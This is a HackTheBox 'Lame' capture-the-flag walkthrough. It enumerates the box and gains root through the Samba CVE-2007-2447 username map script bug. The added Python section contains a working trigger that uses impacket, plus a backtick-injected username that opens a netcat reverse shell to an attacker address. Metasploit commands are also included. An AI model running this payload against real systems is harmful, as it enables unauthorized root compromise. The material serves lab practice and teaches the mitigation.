HackTheBox Lame Walkthrough

In this article I will share a walkthrough of Lame, the first machine released on HackTheBox. It is rated easy: the path to a shell is a single unauthenticated remote command execution bug in Samba, CVE-2007-2447, which lands us directly as root.


Initial Enumeration

I started the initial enumeration with a port scan to find open ports and the services behind them. At first nmap reported the host as down because its ICMP host-discovery probes were being dropped, so I added the -Pn flag to skip host discovery and scan the target regardless. -sC runs the default NSE scripts and -sV probes the service versions; both matter here because the version strings are what lead to the exploit.

┌──(madhav㉿kali)-[~/ctf/htb/lame]
└─$ nmap -sC -sV -oN nmap/initial 10.10.10.3 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-05 18:53 IST
Nmap scan report for 10.10.10.3 (10.10.10.3)
Host is up (0.20s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.9
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-07-05T09:24:25-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h00m19s, deviation: 2h49m43s, median: 18s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.36 seconds

We have four open ports: FTP on 21 (vsftpd 2.3.4, anonymous login allowed), SSH on 22 (OpenSSH 4.7p1) and SMB on 139 and 445 (Samba 3.0.20-Debian). The SMB scripts also tell us SMB2 is not supported and message signing is disabled, so anything we try against Samba will be plain SMB1.

Enumerating FTP

First let's enumerate FTP. nmap already reported that anonymous login is allowed, so we can log in with the username anonymous and any password (an empty one works) and look for files.

┌──(madhav㉿kali)-[~/ctf/htb/lame]
└─$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:madhav): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
229 Entering Extended Passive Mode (|||5687|).
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.
ftp> exit
221 Goodbye.

The listing shows only . and .., so there are no files on the FTP server. Next let's move on to SMB.

Exploiting SMB

From the nmap scan we know the target runs Samba 3.0.20-Debian. A quick search shows that Samba 3.0.20 through 3.0.25rc3 is vulnerable to unauthenticated remote command execution, CVE-2007-2447. The bug is in the non-default 'username map script' option: when it is set in smb.conf, Samba passes the username supplied during SMB session setup to that script through a shell without sanitising it, so shell metacharacters such as backticks in the username are executed by smbd, which runs as root. Because the mapping happens before the password is checked, no valid credentials are needed.
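To make the mechanism concrete, here is an added example that is not part of the original walkthrough. It models the vulnerable dispatch (username spliced into a command line and run through /bin/sh, the way Samba's smbrun executed the map script) next to a hardened form that passes the username as a single argv element, builds a username of the same shape the Metasploit usermap_script module sends, and can deliver it by hand with impacket instead of msfconsole. The hardened form is the generic fix for this class of bug, not a claim about Samba's own patch. Assumptions not taken from the page: the target has username map script configured (Lame does), the attacker's VPN address is 10.10.14.9 with a listener on port 4444, the target's netcat supports -e, and impacket is installed for the live delivery function; everything else runs offline.

```python
"""Added example, not the original post's code: CVE-2007-2447 mechanism
and a manual (non-Metasploit) trigger.

Assumed, not from the page: attacker 10.10.14.9 with `nc -lvnp 4444`,
target netcat supporting -e, impacket installed for trigger().
"""
import subprocess


def vulnerable_map_username(script: str, username: str) -> str:
    """Model of the bug: the username is interpolated into a command line
    and handed to /bin/sh -c, so backticks, $(), ; and | in it are
    interpreted by the shell before the map script ever sees them."""
    result = subprocess.run(f"{script} {username}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def hardened_map_username(script: str, username: str) -> str:
    """Same call without a shell: the username is one argv element, so
    metacharacters reach the script as literal text. Generic fix for the
    bug class; not a statement about Samba's actual patch."""
    result = subprocess.run([script, username], shell=False,
                            capture_output=True, text=True)
    return result.stdout


def build_username(command: str) -> str:
    """Username of the shape the Metasploit usermap_script module sends:
    a '/=' prefix followed by a backtick substitution that runs `command`.
    nohup keeps the command alive after smbd tears down the session."""
    return f"/=`nohup {command}`"


def reverse_shell_username(lhost: str, lport: int) -> str:
    """Reverse shell payload; assumes the target's nc supports -e."""
    return build_username(f"nc -e /bin/sh {lhost} {lport}")


def trigger(rhost: str, username: str) -> None:
    """Send the crafted username in an SMB1 session setup (requires impacket
    and network access). Samba runs the map script before checking the
    password, so the login is expected to fail; the payload has already
    executed by the time STATUS_LOGON_FAILURE comes back."""
    from impacket.smb import SMB_DIALECT
    from impacket.smbconnection import SMBConnection, SessionError

    conn = SMBConnection(rhost, rhost, sess_port=445,
                         preferredDialect=SMB_DIALECT)
    try:
        conn.login(username, "anything")
    except SessionError:
        pass  # normal outcome: the password is wrong, the script still ran
    finally:
        try:
            conn.close()
        except Exception:
            pass


if __name__ == "__main__":
    # Offline demonstration with a harmless payload: the shell expands the
    # backticks in the vulnerable path and leaves them alone in the safe one.
    probe = "/=`echo INJECTED`"
    print(repr(vulnerable_map_username("echo", probe)))  # '/=INJECTED\n'
    print(repr(hardened_map_username("echo", probe)))    # '/=`echo INJECTED`\n'
    # Live use against Lame, after starting `nc -lvnp 4444` on the attacker:
    # trigger("10.10.10.3", reverse_shell_username("10.10.14.9", 4444))
```

Run it as-is to see the two dispatch models side by side with the harmless echo probe; uncomment the last line to fire the real payload at the box. The shell you get back arrives in the netcat listener, not in this script, and it is root because that is the user smbd runs as.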

Exploit-DB also lists a Metasploit module for exactly this bug, which searchsploit confirms.

┌──(madhav㉿kali)-[~/ctf/htb/lame]
└─$ searchsploit Samba 3.0.2
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                  |  Path                           
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                                                | unix/remote/16320.rb            
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)                                                                              | linux/remote/9950.rb            
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                                                                          | linux/remote/16859.rb           
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                                                                        | solaris/remote/16329.rb         
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow                                                                                        | linux/dos/4732.c                
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)                                                                               | multiple/dos/5712.pl            
Samba < 3.0.20 - Remote Heap Overflow                                                                                                           | linux/remote/7701.txt           
Samba < 3.0.20 - Remote Heap Overflow                                                                                                           | linux/remote/7701.txt           
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                                                                   | linux_x86/dos/36741.py          
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results 

So let's open msfconsole and run the module. LHOST is set to the tun0 interface so the reverse payload calls back over the HackTheBox VPN rather than to a LAN address.

use exploit/multi/samba/usermap_script
set LHOST tun0
set RHOSTS 10.10.10.3
exploit

Hurray! We got a shell as root straight away, because smbd runs as root and the injected command inherits that. Now we can read both flags: the user flag is in the /home/makis directory and the root flag is in the /root directory.

cat /home/makis/user.txt
********************************

cat /root/flag.txt
********************************

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Aliz Buzas.